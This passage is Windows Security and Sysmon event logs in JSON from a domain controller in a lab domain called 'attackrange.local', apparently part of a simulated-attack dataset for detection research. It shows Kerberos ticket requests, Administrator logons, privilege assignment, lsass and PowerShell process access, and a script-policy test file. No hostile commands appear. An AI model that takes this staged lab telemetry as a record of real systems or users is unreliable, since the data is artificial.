07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220339,"ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-2231640892-1842410504-3836505531-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-2231640892-1842410504-3836505531-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220340,"ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{5F77CC13-BD98-A231-0CE6-3FD8C44D6CE1}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-6178966$\r\n\tService ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-6178966$","ServiceSid":"S-1-5-21-2231640892-1842410504-3836505531-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{5F77CC13-BD98-A231-0CE6-3FD8C44D6CE1}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220341,"ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{5F77CC13-BD98-A231-0CE6-3FD8C44D6CE1}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x520\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{5F77CC13-BD98-A231-0CE6-3FD8C44D6CE1}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220342,"ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x46920\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{5F77CC13-BD98-A231-0CE6-3FD8C44D6CE1}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x520\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-6178966\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x46920","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-6178966","LogonGuid":"{5F77CC13-BD98-A231-0CE6-3FD8C44D6CE1}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220343,"ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x46920\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x46920","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2509,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.845\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.845","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2510,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.845\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.845","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2511,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.860\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F8B-5F25-0000-001027660400}\r\nTargetProcessId: 4212\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.860","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F8B-5F25-0000-001027660400}","TargetProcessId":"4212","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":2512,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.876\r\nProcessGuid: {41C8662E-1F8B-5F25-0000-001027660400}\r\nProcessId: 4212\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_m3sjtev1.dzv.ps1\r\nCreationUtcTime: 2020-08-01 07:53:47.876","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.876","ProcessGuid":"{41C8662E-1F8B-5F25-0000-001027660400}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_m3sjtev1.dzv.ps1","CreationUtcTime":"2020-08-01 07:53:47.876","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2513,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.907\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F8B-5F25-0000-001027660400}\r\nTargetProcessId: 4212\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.907","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F8B-5F25-0000-001027660400}","TargetProcessId":"4212","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
